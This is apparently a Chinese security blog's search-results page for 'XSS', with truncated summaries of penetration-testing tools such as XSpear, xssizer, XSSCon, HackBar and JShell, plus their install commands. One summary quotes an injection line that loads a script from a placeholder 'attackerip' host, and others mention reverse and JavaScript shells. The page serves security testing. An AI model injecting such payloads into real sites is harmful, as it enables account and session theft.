搜索 “XSS”

不再关注网络安全

B-XSSRF

B-XSSRF

  • 2019-08-29
  • tools
  • 3692 阅读

XSpear:一款强大的XSS漏洞扫描器工具

XSpear:一款强大的XSS漏洞扫描器工具

XSpear XSS扫描器 XSpear是一款基于RubyGems的的XSS漏洞扫描器。拥有常见的XSS漏洞扫描攻击测试功能。还可进行参数分析。 XSS漏洞扫描器 主要特点 基于模式匹配的XSS扫描检测alert confirm prompt无头浏览器上的事件(使用Selenium)测试XSS保护旁路和反射参数的请求/响应反射的参数过滤测试 event handler HTML tag Special Ch...

xssizer – 发现并测试XSS跨站漏洞的工具

xssizer – 发现并测试XSS跨站漏洞的工具

xssizer XSS工具 xssizer帮助渗透测试人员,漏洞猎手和其他安全专业人员轻松检测此类漏洞,并生成可立即使用的XSS Payloads PoC漏洞利用以进行演示。 xssizer XSS工具 xssizer安装与使用 安装 由于是PHP+JS项目,你需要一个server服务来运行它。 # 下载项目 $ git clone https://github.com...

xssizer

xssizer

  • 2019-08-01
  • tools
  • 2841 阅读

跨站脚本XSS Payloads生成器

跨站脚本XSS Payloads生成器

xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞:alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...

XSS Payloads

XSS Payloads

  • 2019-07-30
  • tools
  • 3446 阅读

HackBar:一个硬核Burpsuite插件,支持SQL注入、XSS、SHELL等功能

HackBar:一个硬核Burpsuite插件,支持SQL注入、XSS、SHELL等功能

HackBar (Burpsuite插件) HackBar是一个基于java的Burpsuite插件,支持很多高效便携的功能,例如: SQL注入容错SQL注入常用SQL注入语法XSS常见LFI漏洞WEB Shell反弹Shell 依赖 BurpsuiteJava HackBar安装 点击下载HackBarBurpsuite->扩展:添加jar开始使用吧 已经测试的环境 Burpsuite 1.7.36Windows 10xubu...

XSSCon:一个简洁高效的XSS扫描工具

XSSCon:一个简洁高效的XSS扫描工具

XSSCon介绍 XSSCon是一个用于扫描和利用XSS漏洞的工具,基于python 3.7编写。 XSSCon XSS扫描工具界面 主要特点 抓取网站上的所有链接(爬虫引擎)支持POST和GET表单许多可以自定义的设置高级错误处理多任务支持支持代理支持cookie等等.... XSSCon安装 apt-get install python3 git clone ...

XSSCon

XSSCon

  • 2019-07-09
  • tools
  • 2581 阅读

JShell  – 使用XSS获取JavaScript shell

JShell – 使用XSS获取JavaScript shell

JShell介绍 JShell是一个使用XSS获取JavaScript shell的脚本,基于python。 JShell安装与使用 # 下载 $ git clone https://github.com/s0md3v/JShell.git # 使用 $ python shell.py 12345 # 下载$ git clone https://github.com/s0md3v/JShell.git # ...